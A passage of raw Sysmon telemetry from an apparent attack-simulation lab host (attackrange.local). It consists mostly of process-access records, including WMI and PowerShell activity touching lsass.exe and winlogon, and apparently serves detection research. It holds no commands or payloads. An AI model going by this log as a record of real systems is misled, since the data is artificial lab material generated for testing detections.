CRT4.dll+111bc 10341000x80000000000000002238906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D98-603E-A0AA-00000000AD01}54884228C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A0AA-00000000AD01}5488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002238888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pbppjcwg.0cb.ps12021-03-02 16:53:44.685 10341000x80000000000000002238887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.685{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.675{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 